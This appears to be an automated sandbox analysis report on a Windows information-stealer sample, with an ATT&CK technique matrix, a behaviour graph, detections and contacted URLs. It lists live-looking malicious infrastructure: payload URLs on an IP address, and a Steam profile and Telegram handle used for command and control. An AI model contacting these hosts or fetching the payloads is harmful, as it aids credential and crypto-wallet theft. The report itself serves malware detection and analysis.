                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS55
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Network Share Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                  Process Injection                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1443407 Sample: file.exe Startdate: 17/05/2024 Architecture: WINDOWS Score: 100 33 steamcommunity.com 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 8 other signatures 2->45 9 file.exe 1 2->9         started        signatures3 process4 signatures5 47 Contains functionality to inject code into remote processes 9->47 49 Writes to foreign memory regions 9->49 51 Allocates memory in foreign processes 9->51 53 Injects a PE file into a foreign processes 9->53 12 RegAsm.exe 1 46 9->12         started        17 conhost.exe 9->17         started        process6 dnsIp7 35 steamcommunity.com 104.102.42.29, 443, 49704 AKAMAI-ASUS United States 12->35 37 95.217.240.101, 443, 49705, 49706 HETZNER-ASDE Germany 12->37 25 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->25 dropped 27 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->29 dropped 31 10 other files (none is malicious) 12->31 dropped 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 12->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->59 61 6 other signatures 12->61 19 cmd.exe 1 12->19         started        file8 signatures9 process10 process11 21 conhost.exe 19->21         started        23 timeout.exe 1 19->23         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraHEUR/AGEN.1352999
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\nss3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll0%ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                  https://95.217.240.101IDH0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://95.217.240.101/freebl3.dll100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll100%Avira URL Cloudmalware
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%Avira URL Cloudsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
                  https://95.217.240.101/sqlx.dll100%Sophos S4malware repository uri
                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en0%Avira URL Cloudsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                  https://steamcommunity.com/login/home/?goto=profiles%2F765611996865243220%Avira URL Cloudsafe
                  https://95.217.240.101/softokn3.dlleS100%Avira URL Cloudmalware
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://store.st0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh0%URL Reputationsafe
                  https://95.217.240.101/softokn3.dll100%Avira URL Cloudmalware
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllsS9100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%Avira URL Cloudsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english0%URL Reputationsafe
                  http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                  https://store.steampowered.com/mobile0%URL Reputationsafe
                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%Avira URL Cloudsafe
                  https://95.217.240.101/freebl3.dllwT=100%Avira URL Cloudmalware
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
                  https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a0%Avira URL Cloudsafe
                  https://95.217.240.101100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%Avira URL Cloudsafe
                  https://steamcommunity.com/market/0%Avira URL Cloudsafe
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dll100%Avira URL Cloudmalware
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                  https://steamcommunity.com/tIP0%Avira URL Cloudsafe
                  https://95.217.240.101/D100%Avira URL Cloudmalware
                  https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                  https://t.me/k0mono100%Avira URL Cloudmalware
                  https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199686524322/inventory/100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/badges100%Avira URL Cloudmalware
                  https://95.217.240.101/O100%Avira URL Cloudmalware
                  https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%Avira URL Cloudsafe
                  https://95.217.240.101KEG0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz0%Avira URL Cloudsafe
                  https://95.217.240.101/sqlx.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/mozglue.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/sqlx.dllI100%Avira URL Cloudmalware
                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199686524322100%Avira URL Cloudmalware
                  https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllyS#100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		104.102.42.29
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://95.217.240.101/nss3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/softokn3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/msvcp140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/mozglue.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/sqlx.dlltrue
                    • Sophos S4: malware repository uri
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322true
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/vcruntime140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabHIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=HIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101IDHRegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtRRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968652432276561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%2RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/softokn3.dlleSRegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://store.stRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllsS9RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/freebl3.dllwT=RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
